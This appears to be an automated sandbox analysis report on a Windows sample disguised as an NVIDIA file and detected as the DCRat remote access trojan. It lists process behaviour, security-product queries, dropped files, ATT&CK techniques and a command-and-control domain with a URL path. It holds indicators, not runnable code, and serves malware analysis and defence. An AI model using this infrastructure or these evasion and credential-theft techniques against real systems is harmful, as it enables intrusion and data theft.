                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeQueries volume information: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeQueries volume information: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeQueries volume information: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeQueries volume information: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeCode function: 0_2_0101DF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_0101DF1E
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeCode function: 0_2_0100B146 GetVersionExW,0_2_0100B146
                                  Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                                  Source: hBoBqOIwjXsCbkOMEKwZ.exe, 0000000C.00000002.2177670129.000000001B37E000.00000004.00000020.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 00000015.00000002.2307191010.000000001B4CC000.00000004.00000020.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 0000001A.00000002.2378553906.000000001AE50000.00000004.00000020.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 0000001F.00000002.2478981133.0000000000B1D000.00000004.00000020.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 0000001F.00000002.2505625184.000000001B0D2000.00000004.00000020.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 00000025.00000002.2588332013.000000001AE64000.00000004.00000020.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 00000025.00000002.2588332013.000000001AE44000.00000004.00000020.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 0000002A.00000002.2723949937.000000001BD34000.00000004.00000020.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 0000002A.00000002.2723949937.000000001BCA0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                                  Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                                  Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                                  Source: C:\Windows\System32\Conhost.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                                  Source: C:\Windows\System32\Conhost.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                                  Stealing of Sensitive Information

                                  barindex
                                  Source: Yara matchFile source: 00000005.00000002.2118287388.000000001369A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: NVIDIA Container.exe PID: 1472, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: hBoBqOIwjXsCbkOMEKwZ.exe PID: 2520, type: MEMORYSTR
                                  Source: Yara matchFile source: NVIDIAShare.exe.bin.exe, type: SAMPLE
                                  Source: Yara matchFile source: 5.0.NVIDIA Container.exe.e70000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.3.NVIDIAShare.exe.bin.exe.68642e1.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.3.NVIDIAShare.exe.bin.exe.71702e1.1.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.3.NVIDIAShare.exe.bin.exe.71702e1.1.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.3.NVIDIAShare.exe.bin.exe.68642e1.0.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000000.00000003.2039608649.000000000715A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000005.00000000.2079077521.0000000000E72000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000000.00000003.2039037903.000000000684E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe, type: DROPPED
                                  Source: Yara matchFile source: NVIDIAShare.exe.bin.exe, type: SAMPLE
                                  Source: Yara matchFile source: 5.0.NVIDIA Container.exe.e70000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.3.NVIDIAShare.exe.bin.exe.68642e1.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.3.NVIDIAShare.exe.bin.exe.71702e1.1.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.3.NVIDIAShare.exe.bin.exe.71702e1.1.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.3.NVIDIAShare.exe.bin.exe.68642e1.0.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe, type: DROPPED

                                  Remote Access Functionality

                                  barindex
                                  Source: Yara matchFile source: 00000005.00000002.2118287388.000000001369A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: NVIDIA Container.exe PID: 1472, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: hBoBqOIwjXsCbkOMEKwZ.exe PID: 2520, type: MEMORYSTR
                                  Source: Yara matchFile source: NVIDIAShare.exe.bin.exe, type: SAMPLE
                                  Source: Yara matchFile source: 5.0.NVIDIA Container.exe.e70000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.3.NVIDIAShare.exe.bin.exe.68642e1.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.3.NVIDIAShare.exe.bin.exe.71702e1.1.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.3.NVIDIAShare.exe.bin.exe.71702e1.1.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.3.NVIDIAShare.exe.bin.exe.68642e1.0.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000000.00000003.2039608649.000000000715A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000005.00000000.2079077521.0000000000E72000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000000.00000003.2039037903.000000000684E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe, type: DROPPED
                                  Source: Yara matchFile source: NVIDIAShare.exe.bin.exe, type: SAMPLE
                                  Source: Yara matchFile source: 5.0.NVIDIA Container.exe.e70000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.3.NVIDIAShare.exe.bin.exe.68642e1.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.3.NVIDIAShare.exe.bin.exe.71702e1.1.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.3.NVIDIAShare.exe.bin.exe.71702e1.1.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.3.NVIDIAShare.exe.bin.exe.68642e1.0.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe, type: DROPPED
                                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                  Gather Victim Identity Information11
                                  Scripting
                                  Valid Accounts241
                                  Windows Management Instrumentation
                                  11
                                  Scripting
                                  1
                                  DLL Side-Loading
                                  1
                                  Disable or Modify Tools
                                  OS Credential Dumping1
                                  System Time Discovery
                                  Remote Services1
                                  Archive Collected Data
                                  2
                                  Ingress Tool Transfer
                                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                                  CredentialsDomainsDefault Accounts1
                                  Native API
                                  1
                                  DLL Side-Loading
                                  11
                                  Process Injection
                                  1
                                  Deobfuscate/Decode Files or Information
                                  LSASS Memory3
                                  File and Directory Discovery
                                  Remote Desktop ProtocolData from Removable Media1
                                  Encrypted Channel
                                  Exfiltration Over BluetoothNetwork Denial of Service
                                  Email AddressesDNS ServerDomain Accounts2
                                  Command and Scripting Interpreter
                                  1
                                  Scheduled Task/Job
                                  1
                                  Scheduled Task/Job
                                  4
                                  Obfuscated Files or Information
                                  Security Account Manager57
                                  System Information Discovery
                                  SMB/Windows Admin SharesData from Network Shared Drive3
                                  Non-Application Layer Protocol
                                  Automated ExfiltrationData Encrypted for Impact
                                  Employee NamesVirtual Private ServerLocal Accounts1
                                  Scheduled Task/Job
                                  Login HookLogin Hook3
                                  Software Packing
                                  NTDS261
                                  Security Software Discovery
                                  Distributed Component Object ModelInput Capture13
                                  Application Layer Protocol
                                  Traffic DuplicationData Destruction
                                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                                  DLL Side-Loading
                                  LSA Secrets1
                                  Process Discovery
                                  SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                                  Masquerading
                                  Cached Domain Credentials151
                                  Virtualization/Sandbox Evasion
                                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items151
                                  Virtualization/Sandbox Evasion
                                  DCSync1
                                  Remote System Discovery
                                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                                  Process Injection
                                  Proc Filesystem1
                                  System Network Configuration Discovery
                                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                  Hide Legend

                                  Legend:

                                  • Process
                                  • Signature
                                  • Created File
                                  • DNS/IP Info
                                  • Is Dropped
                                  • Is Windows Process
                                  • Number of created Registry Values
                                  • Number of created Files
                                  • Visual Basic
                                  • Delphi
                                  • Java
                                  • .Net C# or VB.NET
                                  • C, C++ or other language
                                  • Is malicious
                                  • Internet
                                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1590022 Sample: NVIDIAShare.exe.bin.exe Startdate: 13/01/2025 Architecture: WINDOWS Score: 100 152 bibaprog.ru 2->152 168 Suricata IDS alerts for network traffic 2->168 170 Found malware configuration 2->170 172 Antivirus detection for dropped file 2->172 174 13 other signatures 2->174 15 hBoBqOIwjXsCbkOMEKwZ.exe 14 10 2->15         started        20 NVIDIAShare.exe.bin.exe 3 10 2->20         started        22 hBoBqOIwjXsCbkOMEKwZ.exe 2->22         started        signatures3 process4 dnsIp5 154 bibaprog.ru 104.21.64.1, 49704, 49745, 49796 CLOUDFLARENETUS United States 15->154 100 C:\Users\user\Desktop\zwfUdEOY.log, PE32 15->100 dropped 102 C:\Users\user\Desktop\UCVIiXUm.log, PE32 15->102 dropped 104 C:\Users\user\Desktop\JfykNhTG.log, PE32 15->104 dropped 110 2 other malicious files 15->110 dropped 156 Antivirus detection for dropped file 15->156 158 Multi AV Scanner detection for dropped file 15->158 160 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 15->160 162 Machine Learning detection for dropped file 15->162 24 cmd.exe 15->24         started        106 C:\Users\user\...106VIDIA Container.exe, PE32 20->106 dropped 108 C:\Users\user\...\WRqwjVLhswP6l4C4Fp0FJhl.vbe, data 20->108 dropped 27 wscript.exe 1 20->27         started        file6 signatures7 process8 signatures9 176 Uses ping.exe to sleep 24->176 29 hBoBqOIwjXsCbkOMEKwZ.exe 24->29         started        32 conhost.exe 24->32         started        34 chcp.com 24->34         started        36 PING.EXE 24->36         started        178 Windows Scripting host queries suspicious COM object (likely to drop second stage) 27->178 38 cmd.exe 1 27->38         started        process10 file11 136 C:\Users\user\Desktop\skLfaCLK.log, PE32 29->136 dropped 138 C:\Users\user\Desktop\qiYwETGO.log, PE32 29->138 dropped 140 C:\Users\user\Desktop\LxmktYfY.log, PE32 29->140 dropped 142 2 other malicious files 29->142 dropped 40 cmd.exe 29->40         started        42 NVIDIA Container.exe 2 13 38->42         started        45 conhost.exe 38->45         started        process12 file13 48 hBoBqOIwjXsCbkOMEKwZ.exe 40->48         started        51 conhost.exe 40->51         started        53 chcp.com 40->53         started        55 w32tm.exe 40->55         started        128 C:\Users\user\Desktop\ShoatPdx.log, PE32 42->128 dropped 130 C:\Users\user\Desktop\IyVKJmYP.log, PE32 42->130 dropped 132 C:\Users\user\DesktopbehaviorgraphwjbnDUU.log, PE32 42->132 dropped 134 3 other malicious files 42->134 dropped 57 cmd.exe 1 42->57         started        60 schtasks.exe 42->60         started        62 schtasks.exe 42->62         started        64 schtasks.exe 42->64         started        184 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 45->184 signatures14 process15 file16 112 C:\Users\user\Desktop\cjQhkVuX.log, PE32 48->112 dropped 114 C:\Users\user\Desktop\TAxSAtpp.log, PE32 48->114 dropped 116 C:\Users\user\Desktop\PszJebvu.log, PE32 48->116 dropped 118 2 other malicious files 48->118 dropped 66 cmd.exe 48->66         started        180 Uses ping.exe to sleep 57->180 182 Uses ping.exe to check the status of other devices and networks 57->182 69 conhost.exe 57->69         started        71 chcp.com 1 57->71         started        73 w32tm.exe 57->73         started        75 hBoBqOIwjXsCbkOMEKwZ.exe 57->75         started        signatures17 process18 signatures19 166 Uses ping.exe to sleep 66->166 77 hBoBqOIwjXsCbkOMEKwZ.exe 66->77         started        80 conhost.exe 66->80         started        82 chcp.com 66->82         started        84 PING.EXE 66->84         started        process20 file21 144 C:\Users\user\Desktop\oSRflUSV.log, PE32 77->144 dropped 146 C:\Users\user\Desktop\fjyPCrNn.log, PE32 77->146 dropped 148 C:\Users\user\Desktop\chLhgIIs.log, PE32 77->148 dropped 150 2 other malicious files 77->150 dropped 86 cmd.exe 77->86         started        process22 process23 88 hBoBqOIwjXsCbkOMEKwZ.exe 86->88         started        91 conhost.exe 86->91         started        93 chcp.com 86->93         started        95 w32tm.exe 86->95         started        file24 120 C:\Users\user\Desktop\ukwwlbRt.log, PE32 88->120 dropped 122 C:\Users\user\Desktop\snUoPbCy.log, PE32 88->122 dropped 124 C:\Users\user\Desktop124BjcEgcI.log, PE32 88->124 dropped 126 2 other malicious files 88->126 dropped 97 cmd.exe 88->97         started        process25 signatures26 164 Uses ping.exe to sleep 97->164

                                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                  windows-stand
                                  SourceDetectionScannerLabelLink
                                  NVIDIAShare.exe.bin.exe61%ReversingLabsWin32.Trojan.Uztuby
                                  NVIDIAShare.exe.bin.exe100%AviraVBS/Runner.VPG
                                  NVIDIAShare.exe.bin.exe100%Joe Sandbox ML
                                  SourceDetectionScannerLabelLink
                                  C:\Users\user\Desktop\IyVKJmYP.log100%AviraTR/AVI.Agent.updqb
                                  C:\Users\user\Desktop\DnVLkBOS.log100%AviraTR/PSW.Agent.qngqt
                                  C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe100%AviraHEUR/AGEN.1323342
                                  C:\Users\user\AppData\Local\Temp\FuUFRpewDb.bat100%AviraBAT/Delbat.C
                                  C:\Users\user\Desktop\AOEnQqnj.log100%AviraTR/PSW.Agent.qngqt
                                  C:\Users\user\Desktop\DSPMVDWa.log100%AviraTR/AVI.Agent.updqb
                                  C:\Users\user\AppData\Local\Temp\ij3ogloIkp.bat100%AviraBAT/Delbat.C
                                  C:\Users\user\AppData\Local\Temp\B0uJAwGmBV.bat100%AviraBAT/Delbat.C
                                  C:\Users\user\AppData\Roaming\NVIDIA\WRqwjVLhswP6l4C4Fp0FJhl.vbe100%AviraVBS/Runner.VPG
                                  C:\Users\user\Desktop\CTevJfQr.log100%AviraTR/AVI.Agent.updqb
                                  C:\Users\user\Desktop\JOqdsLLu.log100%AviraTR/AVI.Agent.updqb
                                  C:\Users\user\AppData\Local\Temp\1LArpmQ7xZ.bat100%AviraBAT/Delbat.C
                                  C:\Users\user\AppData\Local\Temp\cMdeBf80Aw.bat100%AviraBAT/Delbat.C
                                  C:\Users\user\AppData\Local\Temp\L4pr7KvdK9.bat100%AviraBAT/Delbat.C
                                  C:\Users\user\AppData\Local\Temp\1QWUF8ga47.bat100%AviraBAT/Delbat.C
                                  C:\Users\user\Desktop\JfykNhTG.log100%AviraTR/AVI.Agent.updqb
                                  C:\Users\user\AppData\Local\Temp\vPPPhWVNfR.bat100%AviraBAT/Delbat.C
                                  C:\Users\user\AppData\Local\Temp\s4Al4mMfKa.bat100%AviraBAT/Delbat.C
                                  C:\Users\user\AppData\Local\Temp\sxRqhXCXyo.bat100%AviraBAT/Delbat.C
                                  C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe100%AviraHEUR/AGEN.1323342
                                  C:\Users\user\Desktop\JesvDTTS.log100%AviraTR/AVI.Agent.updqb
                                  C:\Users\user\Desktop\DnVLkBOS.log100%Joe Sandbox ML
                                  C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe100%Joe Sandbox ML
                                  C:\Users\user\Desktop\AOEnQqnj.log100%Joe Sandbox ML
                                  C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe100%Joe Sandbox ML
                                  C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe66%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                  C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe66%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                  C:\Users\user\Desktop\AAjFTaDk.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                                  C:\Users\user\Desktop\AOEnQqnj.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                  C:\Users\user\Desktop\AVNUZtIi.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                                  C:\Users\user\Desktop\BlhnJSvN.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                                  C:\Users\user\Desktop\CTevJfQr.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                  C:\Users\user\Desktop\DSPMVDWa.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                  C:\Users\user\Desktop\DaiMBcDs.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                                  C:\Users\user\Desktop\DnVLkBOS.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                  C:\Users\user\Desktop\GwjbnDUU.log25%ReversingLabs
                                  C:\Users\user\Desktop\HbFMikPW.log25%ReversingLabs
                                  C:\Users\user\Desktop\IMSbQhuH.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                                  C:\Users\user\Desktop\IyVKJmYP.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                  C:\Users\user\Desktop\JOqdsLLu.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                  C:\Users\user\Desktop\JesvDTTS.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                  C:\Users\user\Desktop\JfykNhTG.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                  C:\Users\user\Desktop\LxmktYfY.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                  C:\Users\user\Desktop\NBjcEgcI.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                  C:\Users\user\Desktop\OOMCloya.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                  C:\Users\user\Desktop\PszJebvu.log25%ReversingLabs
                                  C:\Users\user\Desktop\ShoatPdx.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                  C:\Users\user\Desktop\TAxSAtpp.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                  C:\Users\user\Desktop\TMLKnwYz.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                  C:\Users\user\Desktop\TxJtcnQc.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                  C:\Users\user\Desktop\UCVIiXUm.log25%ReversingLabs
                                  C:\Users\user\Desktop\VAeASPIF.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                                  C:\Users\user\Desktop\XOysNJXm.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                                  C:\Users\user\Desktop\XwgSVREI.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                  C:\Users\user\Desktop\chLhgIIs.log25%ReversingLabs
                                  C:\Users\user\Desktop\cjQhkVuX.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                  C:\Users\user\Desktop\fjyPCrNn.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                  C:\Users\user\Desktop\gzqzblNZ.log25%ReversingLabs
                                  C:\Users\user\Desktop\hxRHxlcT.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                  C:\Users\user\Desktop\oSRflUSV.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                  C:\Users\user\Desktop\pAbpDGmk.log25%ReversingLabs
                                  C:\Users\user\Desktop\qiYwETGO.log25%ReversingLabs
                                  C:\Users\user\Desktop\skLfaCLK.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                                  C:\Users\user\Desktop\snUoPbCy.log25%ReversingLabs
                                  C:\Users\user\Desktop\ukwwlbRt.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                                  C:\Users\user\Desktop\xYhnoKfH.log25%ReversingLabs
                                  C:\Users\user\Desktop\zwfUdEOY.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                                  No Antivirus matches
                                  No Antivirus matches
                                  SourceDetectionScannerLabelLink
                                  http://bibaprog.ru0%Avira URL Cloudsafe
                                  http://bibaprog.ru/0%Avira URL Cloudsafe
                                  http://bibaprog.ru/ProviderEternallineauthmultiTrackwordpressWpDownloads.php0%Avira URL Cloudsafe
                                  NameIPActiveMaliciousAntivirus DetectionReputation
                                  bibaprog.ru
                                  104.21.64.1
                                  truetrue
                                    unknown
                                    NameMaliciousAntivirus DetectionReputation
                                    http://bibaprog.ru/ProviderEternallineauthmultiTrackwordpressWpDownloads.phptrue
                                    • Avira URL Cloud: safe
                                    unknown
                                    NameSourceMaliciousAntivirus DetectionReputation
